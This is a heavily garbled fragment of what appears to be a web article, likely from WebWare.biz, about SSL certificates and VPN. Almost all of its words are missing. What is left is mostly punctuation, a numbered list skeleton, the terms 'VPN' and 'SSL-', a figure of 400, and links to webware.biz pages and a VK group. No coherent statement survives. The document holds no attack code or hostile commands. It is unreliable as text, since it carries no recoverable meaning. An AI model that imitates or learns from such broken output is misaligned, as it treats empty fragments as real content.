, , .
, .
.
, ,
, .
3. VPN,
.
4. SSL-. :
. : , , ,
- SSL-, , .
: ( , , , -
, - . .) . !
, SSL-.
( , /
/ ), SSL-
( , ). ,
, , 400 .
, SSL-.
- ,
SSL-, .
, , .
( WebWare.biz),
- ,
: http://webware.biz/?page_id=27

http://webware.biz/


http://webware.biz/?feed=rss2 https://vk.com/webware_biz

http://webware.biz/?p=3920